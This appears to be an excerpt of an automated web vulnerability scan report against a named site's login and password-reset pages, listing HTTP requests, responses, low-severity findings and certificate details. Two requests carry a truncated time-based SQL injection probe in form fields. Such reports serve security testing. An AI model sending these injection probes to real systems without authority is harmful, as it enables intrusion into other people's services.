HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:54:04 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: PHPSESSID=uh9nm4eto5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:49:57 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... lid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form id="content:content" method="post" style="margin:0px" action="index.php"> <br /> ...[SNIP]... <td> <input id="txtPassword" name="txtPassword" type="password" value="" style="width: 200px" onblur="validatePresent ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:39:20 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... lid; width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;"> <form id="content:content" method="post" style="margin:0px" action="index.php"> <br /> ...[SNIP]... <td> <input id="txtPassword" name="txtPassword" type="password" value="" style="width: 200px" onblur="validatePresent ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=slhdu6ps00 Accept-Encoding: gzip, deflate Content-Length: 97 btnCancel=%27;WAITFOR |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:30:44 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3810 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <input id="txtEmail" name="txtEmail" type="text" value="netsparker@example.com" style="width:300px" onblur="validatePresent ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /index.php |
POST /index.php HTTP/1.1 Referer: https://secure.trust User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: secure.trust-guard.com Cookie: PHPSESSID=todvqp9ae2 Accept-Encoding: gzip, deflate Content-Length: 93 btnLogin=%27;WAITFOR |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:52:28 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5083 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... <input id="txtEmail" name="txtEmail" type="text" value="netsparker@example.com" style="width: 200px" onblur="validatePresent ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
Issued to: | secure.trust-guard.com |
Issued by: | Equifax Secure Global eBusiness CA-1 |
Valid from: | Thu Oct 23 09:21:27 CDT 2008 |
Valid to: | Tue Oct 23 09:21:27 CDT 2012 |
Issued to: | Equifax Secure Global eBusiness CA-1 |
Issued by: | Equifax Secure Global eBusiness CA-1 |
Valid from: | Sun Jun 20 23:00:00 CDT 1999 |
Valid to: | Sat Jun 20 23:00:00 CDT 2020 |